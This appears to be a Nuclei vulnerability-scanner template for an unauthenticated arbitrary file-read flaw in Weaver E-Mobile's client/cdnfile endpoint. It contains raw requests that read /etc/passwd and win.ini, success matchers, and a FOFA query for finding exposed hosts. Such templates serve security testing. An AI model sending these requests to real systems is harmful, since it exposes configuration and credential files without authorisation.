http:
    - matchers:
        - part: body
          type: word
          words:
            - ; for 16-bit app support
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /client/cdnfile/1C/Windows/win.ini?windows HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - root:x
            - /bin/bash
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /client/cdnfile/C/etc/passwd?linux HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
id: WeaverOA-E-Mobile-client_cdnfile-File-reading
info:
    author: Superhero
    description: |-
        fofa: app="泛微-EMobile"
        泛微E-Mobile client/cdnfile 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
    name: 泛微E-Mobile client/cdnfile 任意文件读取漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247487494&idx=1&sn=464d9a36a7cb01d83d481ec6ec6d27b0&chksm=c267a535f5102c23ea4e678b5f75cfd032e23b066db9dceb9f0190ca0a4a13dcdcc1eaf229fc&token=1439003696&lang=zh_CN#rd
    severity: high
    tags:
        - File reading
        - 泛微-EMobile
        - 泛微e-mobile
